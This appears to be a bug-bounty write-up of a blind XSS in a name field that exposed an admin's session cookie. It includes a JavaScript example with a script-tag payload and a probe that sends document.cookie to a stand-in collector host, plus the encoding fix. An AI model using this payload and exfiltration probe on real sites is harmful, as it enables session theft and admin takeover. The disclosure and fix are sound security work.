Today I’m writing a blog post after a long time: how I got $22,000 by pwning a website. Since it’s a private program I can’t disclose the name, so I’ll be using example.com to explain how I exploited a blind XSS to pwn the website.
I was doing a monkey test on the name field to get an XSS, without any idea whether my payload would execute or not. So I just entered the payload
but nothing worked for me. The next day I got a message from a team member of the company that an alert was popping up on the admin panel whenever they went to the verify-account function, so that’s how I came to know there was a blind XSS in the name field. I used an XSS Hunter payload to get the admin user’s cookies, since the payload was executing in the admin panel.
As soon as the admin tried to verify my account I got the session in XSS Hunter, and from there I was able to access the admin panel of the application.
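To make the mechanics concrete, here is an added example, not code from the original post or from XSS Hunter, showing how a payload stored in a name field becomes live markup in an admin's browser, what a callback probe reports, and the output-encoding fix. The collector host, the probe path, the user record and the admin-panel markup are all assumptions; the real application's templates are not known.

```javascript
// Added example, not code from the original post or from XSS Hunter.
// Assumptions: the collector host, probe path, sample account and the
// admin-panel markup are illustrative stand-ins.

// Hypothetical attacker-controlled host that receives the callbacks.
const COLLECTOR = "https://collector.example";

// Payload stored in the name field. The leading quote and angle bracket
// close an attribute or tag if the name is echoed inside one; the script
// tag loads a remote probe, so the attacker can change what runs later
// without resubmitting the form (the pattern XSS Hunter style tools use).
function blindXssPayload(collector) {
  return `"><script src="${collector}/probe.js"></script>`;
}

// Source of the remote probe: once it runs in the admin's browser it
// beacons the page URL and any cookie readable from JavaScript back to
// the collector, which is how the session ends up in the attacker's hands.
function probeSource(collector) {
  return (
    `new Image().src=${JSON.stringify(collector + "/cb")}` +
    `+"?u="+encodeURIComponent(location.href)` +
    `+"&c="+encodeURIComponent(document.cookie);`
  );
}

// Vulnerable rendering of the verify-account list: the stored name is
// concatenated into HTML unencoded, so the payload above becomes markup.
function renderVerifyRowUnsafe(user) {
  return `<tr><td>${user.name}</td>` +
    `<td><a href="/verify?id=${user.id}">verify</a></td></tr>`;
}

// Fix: encode every untrusted value for the context it lands in.
// Text and attribute context get HTML entity encoding; URL query
// parameters get percent-encoding.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderVerifyRowSafe(user) {
  return `<tr><td>${escapeHtml(user.name)}</td>` +
    `<td><a href="/verify?id=${encodeURIComponent(user.id)}">verify</a></td></tr>`;
}

// Stand-in for a browser parser: would this markup create a script
// element? An entity-encoded "&lt;script" is text, not an element.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Constructed sample account, registered with the payload as its name.
const attackerAccount = { id: 1337, name: blindXssPayload(COLLECTOR) };

console.log("unsafe:", renderVerifyRowUnsafe(attackerAccount));
console.log("safe:  ", renderVerifyRowSafe(attackerAccount));
```

The probe only gets the session because the cookie was readable from `document.cookie`; with the `HttpOnly` flag set the XSS would still fire in the admin's browser and could drive the panel from there, but the cookie value itself would not appear in the callback. Output encoding on the admin side is what actually removes the bug.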
I got other bugs as well.